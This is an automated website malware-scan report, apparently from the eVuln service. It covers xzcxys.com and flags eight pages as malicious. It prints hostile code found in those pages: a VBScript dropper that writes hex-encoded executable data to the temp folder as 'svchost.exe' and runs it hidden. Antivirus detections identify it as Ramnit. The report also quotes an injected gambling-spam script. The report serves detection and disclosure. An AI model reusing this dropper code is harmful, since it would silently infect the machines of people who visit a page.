Malware Scanner report for xzcxys.com

Malicious/Suspicious/Total urls checked: 8/0/22

8 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.xzcxys.com/	HTTP/1.1 200 OK Date: Fri, 25 Jul 2014 01:11:00 GMT Accept-Ranges: bytes ETag: "aa8a7885e9dcf1:bf84b" Server: Microsoft-IIS/6.0 Content-Length: 188675 Content-Location: http://www.xzcxys.com/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 13:46:31 GMT	clean
http://www.xzcxys.com/index.html	200 OK Content-Length: 188675 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3622 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.24383.com/999.js	200 OK Content-Length: 79739 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.writeln("<head>"); document.writeln("<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=gb2312\" \/>"); document.writeln("<title>»Ê¹ÚÍøwww.kfc999.com»Ê¹ÚÏÖ½ð¿ª»§,°Ù¼ÒÀÖ,Ì«Ñô³ÇÓéÀÖ³Ç<\/title>"); document.writeln("<meta name=\"description\" content=\"»Ê¹ÚÍøwww.kfc999.comÊÇÒ»¼Ò×¨Òµ\/È¨ÍþµÄ»Ê¹ÚÏÖ½ðÍø¼°È«Ñ¶Íø,»Ê¹ÚÍøÍÆ¼öÈ«Çò×îºÃµÄ²©²Ê¹«Ë¾,°Ù¼ÒÀÖ,»Ê¹Ú¿ª»§,Ì«Ñô³ÇÓéÀÖ³Ç.ÈÃÄú°²×ø¼ÒÖÐÇáËÉÏíÊÜÍøÉÏÓéÀÖ.\" \/>"); document.writeln("<met ... 3522 bytes are skipped ...); document.writeln(" <\/div>"); document.writeln(""); document.writeln(""); document.writeln(" <\/table>"); document.writeln(" <\/td>"); document.writeln(" <\/tr>"); document.writeln("<\/table>"); document.writeln(""); document.writeln(""); document.writeln(" <\/div>"); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(" <\/html>") Antivirus reports: NANO-Antivirus Trojan.Url.IframeB.bcfegr
http://www.xzcxys.com/a/xianjinshebei/	HTTP/1.1 200 OK Date: Fri, 25 Jul 2014 01:11:07 GMT Accept-Ranges: bytes ETag: "8c5496ce9dcf1:bf84b" Server: Microsoft-IIS/6.0 Content-Length: 184676 Content-Location: http://www.xzcxys.com/a/xianjinshebei/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 13:45:48 GMT	clean
http://www.xzcxys.com/a/xianjinshebei/index.html	200 OK Content-Length: 184676 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ... 3078 bytes are skipped ...00000000000000000000000000000000000" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.xzcxys.com/baidu.js	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://www.xzcxys.com/test404page.js	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://www.xzcxys.com/a/shangbiaoyinshua/	HTTP/1.1 200 OK Date: Fri, 25 Jul 2014 01:11:10 GMT Accept-Ranges: bytes ETag: "5c3aeb6ae9dcf1:bf84b" Server: Microsoft-IIS/6.0 Content-Length: 188274 Content-Location: http://www.xzcxys.com/a/shangbiaoyinshua/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 13:45:46 GMT	clean
http://www.xzcxys.com/a/shangbiaoyinshua/index.html	200 OK Content-Length: 188274 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3625 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.xzcxys.com/a/siwangyinshua/	HTTP/1.1 200 OK Date: Fri, 25 Jul 2014 01:11:15 GMT Accept-Ranges: bytes ETag: "4c9bd6be9dcf1:bf84b" Server: Microsoft-IIS/6.0 Content-Length: 188025 Content-Location: http://www.xzcxys.com/a/siwangyinshua/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 13:45:47 GMT	clean
http://www.xzcxys.com/a/siwangyinshua/index.html	200 OK Content-Length: 188025 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3621 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.xzcxys.com/a/jiaoyinbiaoqian/	HTTP/1.1 200 OK Date: Fri, 25 Jul 2014 01:11:18 GMT Accept-Ranges: bytes ETag: "7c9c4769e9dcf1:bf84b" Server: Microsoft-IIS/6.0 Content-Length: 188263 Content-Location: http://www.xzcxys.com/a/jiaoyinbiaoqian/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 13:45:43 GMT	clean
http://www.xzcxys.com/a/jiaoyinbiaoqian/index.html	200 OK Content-Length: 188263 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3622 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.xzcxys.com/a/yinshuayaopin/	HTTP/1.1 200 OK Date: Fri, 25 Jul 2014 01:11:21 GMT Accept-Ranges: bytes ETag: "90c2b96ce9dcf1:bf84b" Server: Microsoft-IIS/6.0 Content-Length: 187931 Content-Location: http://www.xzcxys.com/a/yinshuayaopin/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 13:45:49 GMT	clean
http://www.xzcxys.com/a/yinshuayaopin/index.html	200 OK Content-Length: 187931 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3623 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.xzcxys.com/a/kongbaimoqie/	HTTP/1.1 200 OK Date: Fri, 25 Jul 2014 01:11:25 GMT Accept-Ranges: bytes ETag: "c913f6ae9dcf1:bf84b" Server: Microsoft-IIS/6.0 Content-Length: 188219 Content-Location: http://www.xzcxys.com/a/kongbaimoqie/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 13:45:45 GMT	clean
http://www.xzcxys.com/a/kongbaimoqie/index.html	200 OK Content-Length: 188219 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3622 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.xzcxys.com/tags.php?/%B0%C4%C3%C5%CC%AB%D1%F4%B3%C7%CD%F8%D5%BE/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://www.xzcxys.com/tags.php?/%CD%F8%CD%A8%B4%AB%C6%E6%CB%BD%B7%FE/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://www.xzcxys.com/tags.php?/%D7%E3%C7%F2%BF%AA%BB%A7/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://www.xzcxys.com/tags.php?/%D7%E3%C7%F2%D6%B1%B2%A5%B1%C8%B7%D6/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://www.xzcxys.com/tags.php?/%CD%F8%C2%E7%B6%C4%C7%F2/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: xzcxys.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: xzcxys.com
Referer: http://www.google.com/search?q=xzcxys.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=xzcxys.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://xzcxys.com/

Result: xzcxys.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for xzcxys.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools